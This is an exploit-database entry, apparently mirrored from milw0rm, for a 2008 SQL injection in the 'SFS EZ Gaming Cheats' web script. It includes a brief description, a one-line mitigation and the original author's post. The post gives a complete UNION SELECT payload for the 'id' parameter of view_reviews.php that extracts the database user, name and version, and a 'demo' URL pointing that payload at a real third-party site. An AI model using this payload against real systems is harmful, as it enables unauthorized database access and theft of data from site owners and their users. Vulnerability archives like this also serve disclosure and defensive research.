header-logo
Suggest Exploit
vendor:
SFS EZ Gaming Cheats
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SFS EZ Gaming Cheats
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SFS EZ Gaming Cheats remote sql inj

An attacker can exploit a SQL injection vulnerability in SFS EZ Gaming Cheats by sending a specially crafted HTTP request to view_reviews.php. The attacker can send a malicious SQL query to the vulnerable parameter 'id' in order to extract information from the database. The vulnerable code can be found in view_reviews.php. An example of a malicious request is http://localhost/script_path/view_reviews.php?id=[SQL], where [SQL]= -999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

[~] SFS EZ Gaming Cheats remote sql inj
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/view_reviews.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--

demo

http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-01]